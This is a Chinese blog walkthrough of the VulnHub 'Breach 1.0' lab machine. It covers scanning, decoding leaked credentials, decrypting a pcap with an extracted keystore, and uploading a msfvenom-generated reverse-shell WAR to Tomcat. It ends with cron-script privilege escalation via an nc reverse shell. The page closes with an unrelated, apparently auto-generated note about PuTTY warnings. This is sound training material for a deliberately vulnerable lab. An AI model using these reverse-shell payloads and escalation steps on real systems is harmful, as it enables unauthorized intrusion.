Vulnhub-Breach 1.0

Breach 靶机固定IP
192.168.110.140

信息收集

namp 扫一下开了几个端口
nmap -sV -A -v 192.168.110.140
image.png
有一千多多个端口 开放 这很有可能迷惑 所使用的

这里就只要浏览器访问他的80端口网页试一下
image.png
给了一个这样的一个页面 ,我们要去找一些相关的信息
F12 看一下它的代码
image.png

base64解码

这里看出一一个base64 码
我们这里使用python 解一下码 是一个二次加密的base64
image.png
这像一个账号密码的 不管了先收集一下
pgibbons:damnitfeel g o o d t o b e a g a n g goodtobeagang goodtobeagangta
然后继续观察网页发现一个超链接 点进去观察
image.png
发现 是一个 佩内特罗德赛博咨询有限责任公司 的什么网页 ????
点击 Employee portal 就弹出一个cms 的网页

使用信息收集的base64解密登录CMS

image.png
需要账号密码 ??想到了刚才的base64 解密之后就是一个 账号密码了
看能 不能登上去看看
image.png
成功登上后台
看左边 发现三个红点好像是邮箱 ,不会是什么秘密把
前两个没有什么用说的是安全什么的
看最后一个 有两个线索点
一个是 在 http://192.168.110.140/.keystore 保存了一个东西
另外一个是让找到一个新的SSL 证书
下载包含SSL证书的密钥库keystore文件(keystore是存储公私密钥的一种文件格式)
image.png
点击View Account菜单进入界面,再依次点击页面的Content,会弹出一行链接Content SSL implementation test capture
image.png
介绍
我已经上传了我们红队重新制作的攻击的pcap文件。我不确定他们使用了什么诡计,但我无法读取文件。我尝试了C|EH研究中的每一个nmap开关,只是无法弄清楚。** **http://192.168.110.140/impresscms/_SSL_test_phase1.pcap他们告诉我别名,存储密码和密钥密码都设置为"tomcat"。这有用吗?有谁知道这是什么?我想我们现在被安全加密了吗?-彼得·皮尔斯我将在接下来的2天内钓鱼,无法访问电子邮件或电话。
有发现了papc文件 已经告诉了密码都是tomcat

从密钥库导出.p12证书,将keystore拷贝到D盘目录,导出名为:tomcatkeystore.p12的证书
keytool -importkeystore -srckeystore .\keystore -destkeystore d:\tomcatkeystore.p12 -deststoretype PKCS12 -srcalias tomcat
image.png

Wireshark抓包

将证书导入Wireshark

image.png
过滤http
image.png
http追踪流 找到一串 base64
image.png

第二个密码

解密
tomcat:Tt\5D8F(#!*u=G)4m7zB
好像又是一个账号密码
image.png

找到一个网站 但是打不开发不了数据 我们这里使用bp
image.png

Burp

成功访问
image.png

上传.war 包

登入
image.pngTomcat后台getshell
这里需要上传.war 包
msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.110.128 lport=8989 -f war -o exp.war

Payload size: 1092 bytes
Final size of war file: 1092 bytes
Saved as: exp.war

use exploit/multi/handler

image.png
上传
image.png
访问
image.png

msf反弹shell >>>提权

image.png
反弹成功后,输入命令python -c 'import pty;pty.spawn(“/bin/bash”)'得到bash模式,
最后得到shell,并尝试登录mysql
image.png

查找数据库
show databases;
image.png
use mysql ;
查看所有表
image.png
找到用户 表 密码
转一下md5
image.png
解码
image.png
密码: thelaststraw
登录
image.png
看到历史命令su提权到了blumbergh用户。
需要找到blumbergh用户的密码。
image.png
得到六张图片
image.png
第一张图片
查看字符串信息
有两个很像密码试一下
strings bill.png
image.png
登录试一下
image.png
成功登录
历史记录
image.png
找到tidyup.sh
image.png
这是一段清理脚本,描述中说明每3分钟执行清理,删除webapps目录下的文件,因此之前上传的 马 总是被删除,需要重新上传。查看tidyup.sh的权限,对该脚本没有写入权限,只有root可以

tidyup.sh文件只有root可写,而能够以root权限运行tee命令,那么用tee命令写tidyup.sh:先将反弹shell命令写入shell.txt文件,nc反弹命
image.png
nc监听

提权成功

image.png

  • 33
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
回答: 当您在使用PuTTY时,如果看到"WARNING - POTENTIAL SECURITY BREACH!"的警告信息,这可能是由于几种原因引起的。首先,这可能是因为您连接的服务器使用了较低的加密算法,而PuTTY检测到这可能存在安全风险。这是为了防止降级攻击。\[2\]其次,这可能是因为您连接的服务器返回了未分配的公共IP地址,这些地址通常可以被安全地阻止,因为它们不应该处于活动使用状态。\[1\]最后,PuTTY在某些平台上可能会在处理线条绘制字符时出现问题。\[3\]如果您遇到这个警告信息,建议您仔细检查服务器的安全性,并确保使用较高级别的加密算法来保护您的连接。 #### 引用[.reference_title] - *1* *3* [SG-1000使用指南](https://blog.csdn.net/weixin_33991727/article/details/89872893)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [PuTTY用户手册(十四)](https://blog.csdn.net/le_17_4_6/article/details/86522290)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值